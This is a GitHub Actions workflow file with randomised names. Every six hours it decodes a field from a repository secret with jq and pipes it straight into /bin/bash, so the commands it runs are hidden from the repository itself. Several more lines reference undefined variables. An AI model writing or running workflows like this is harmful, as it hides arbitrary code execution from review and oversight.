name: duanhongriyu

on:
  workflow_dispatch:
  schedule:
    - cron: '44 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duanhongriyu
        env:
          ci5351: ${{ secrets.ci5351 }}
        run: |
          echo $ci5351 | jq -r .qw54571 | /bin/bash
          echo $jsme7163 | jq -r .t126 | /bin/bash
          echo $cnybw0 | jq -r .dme78868 | /bin/bash
          echo $s66847 | jq -r .c8855 | /bin/bash
          echo $fml404 | jq -r .d3495 | /bin/bash
          echo $f230 | jq -r .c598 | /bin/bash

